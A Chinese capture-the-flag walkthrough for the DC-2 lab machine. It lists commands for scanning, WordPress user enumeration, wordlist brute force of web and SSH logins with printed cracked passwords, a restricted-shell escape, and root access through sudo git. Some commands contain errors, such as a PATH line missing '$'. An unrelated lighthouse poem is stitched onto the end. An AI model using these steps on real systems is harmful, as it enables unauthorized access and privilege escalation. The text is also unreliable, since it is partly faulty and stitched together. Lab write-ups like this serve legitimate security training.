dc-2靶机 最终获取root权限

环境准备

dc-2靶机

kali虚拟机

第一步:kali系统网络设定nat模式 dc-2 网络也同样设定nat模式(设置到同一网段即可)

nmap  -sP  192.168.xx.0/24  扫描该网段存活主机

命令效果

第二步:扫描主机开放端口

nmap -A 192.168.139.132 -p 1-60000   扫描主机开放端口
80端口  7744端口 ssh

命令效果

第三步:浏览器访问ip地址发现自动跳转到dc-2域名

vim  /etc/hosts(做dns解析)
192.168.xx.xx  dc-2
此时访问该域名即可访问到页面

命令效果

第四步:分析后台的可登录页面

nikto -h dc-2
wpscan --update  要先跟新再操作 （如果提示更新失败反复更新直到成功）
wpscan  --url dc-2 -e u  爆破该平台的可登录用户名
admin
tom
jerry

命令效果

第五步:爆破三个账户的密码信息 flas 1中的提示使用cewl工具生成字典

cewl dc-2 > /tmp/password.list 生成密码字典
vim /tmp/user.list 生成用户表
wpscan --url dc-2  -U /tmp/user.list  -P /tmp/password.list
破解出
[SUCCESS] - jerry / adipiscing                                                
[SUCCESS] - tom / parturient  

命令效果

第六步:tom用户ssh登录后

hydra -L /tmp/user.list -P /tmp/password.list 192.168.92.135 ssh -s 7744  得到tom用户的登录密码tom / parturient

ssh tom@dc-2  -p  7744 登录tom之后
发现tom的命令解释器有问题
BASH_CMDS[a]=/bin/bash;
a                    # 相当于使用a调用 /bin/bash
/bin/bash            # 之后设定该命令解释器可以运行的命令
export PATH=PATH:/usr/bin:/sbin     #即可使用所有普通用户的命令

命令效果

第七步:jerry用户通过sudo -l 分析出自己使用的root权限的命令为git

su - jerry 密码                     #切换用户  爆破后的密码
sudo git -p  --help
:!whoami   提权

命令效果

---

灯塔            大海之上——

灯塔熄灭之前，月亮比故国那轮更圆，

远方的爱，比远方更远。那些波涛，

是空阔中盛开的苜蓿花，那些鱼群，

曾经是诗篇中的词语，我爱上它们之间隐藏的暗礁，

也爱上它们之间的翻涌、颤抖，以及动荡。

---